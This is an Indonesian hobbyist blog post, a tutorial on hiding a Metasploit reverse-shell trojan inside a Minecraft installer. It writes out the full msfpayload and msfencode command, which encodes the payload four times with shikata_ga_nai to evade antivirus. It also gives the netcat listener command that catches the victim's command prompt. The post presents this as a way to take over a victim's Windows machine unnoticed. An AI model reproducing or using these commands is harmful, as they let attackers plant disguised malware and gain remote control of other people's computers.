hmm... udah lama ga ngePost, maklum bentar lagi ane UN :) , postingan kali ini tentang "Take over the windows with metasploit" terdengar keren ya.. tp tidak juga... tutorial ini saya pelajari dari Red-Dragon dan saya kutip dari blognya RD's BLog oke kita mulai :D
Requirements:
1. Metaslpoit (Download)
2. Netcat (search in google)
tapi bagi kalian pengguna backtrack.. di 3rd revolution'a, bt5r3, itu semua sudah tersedia, mungkin sedikit butuh diupgrade aja..saya disini menggunakan backtrack sebagai OS untuk kegiatan ini.
let's start!!
1. buat dulu si penyusup kecil kita, trojan!, dan pakaikan dia jubah supaya dapat menyelinap dengan aman tanpa dicurigai (encoding). Saya menggunakan installasi Minecraft, hmm..game yang menarik, tapi anda bisa menggunakan installasi lain sesuai kreatifitas,
untuk membuat trojan anda bisa menggunakan msfpayload, dan membungkusnya dengan msfencode
Command :
root@cyberhide:~# msfpayload windows/shell_reverse_tcp LHOST=10.162.80.172 LPORT=4444 R | msfencode -a x86 -e x86/shikata_ga_nai -c 4 -t exe -x /root/Minecraft.exe > /root/Desktop/Minecraft.exe
keterangan:
1. Saya menggunakan payload jenis windows/shell_reverse_tcp, jika korban membuka file tsb, maka saya langsung mendapatkan command prompt korban.
2. Karena payload berjenis reverse connection, maka saya memasukan opsi LHOST, LHOST bernilai IP address saya.
3. LPORT adalah port yang saya gunakan untuk menerima sesi command shell.
4. Trojan ini kemudian saya encode dengan arsitektur x86 (32 bit)
5. Kemudian saya encode dengan encoder x86/shikata_ga_nai
6. Saya melakukan encode sebanyak 4 kali.
7. Kemudian output file berekstensi exe (executable file for windows)
9. Kemudian hasil encoding saya simpan di Desktop dengan nama Minecraft.exe
warning di screenshot atas di hiraukan saja, saya membuat kesalahan sedikit
berikut adalah SS file .exe asli minecraft kita
dan berikut adalah trojan kita yang telah di encode
waahhh.. dalam bentuk fisik sih ga ada yang beda, bahkan size-pun sempurna,
setelah membuat file cloning-an ini..mari kita uji coba
2. buka netcat
command:
root@cyberhide:~# netcat -l -v -p 4444
keterangan:
-l adalah command listening
-p command listening pada port (XXXX)
dan pada saat file tsb di eksekusi korban , netcat kita akan merespon seperti gambar di bawah
gotchaaa!! cmd udah di tangan, apapun bisa anda lakukan dengan terminal anda.
ini ada ebook "metasploit the penetration tester's guide" bagi pembaca setia (download) ,dan ebook offensive security is.gd/Yhi3NR karna itu file torrent, saya download pake ini --> (download)
semoga sukses, try and error guys! maaf bila ada ketidakjelasan dalam menerangkan dan kesalahan2 kecil lainnya..
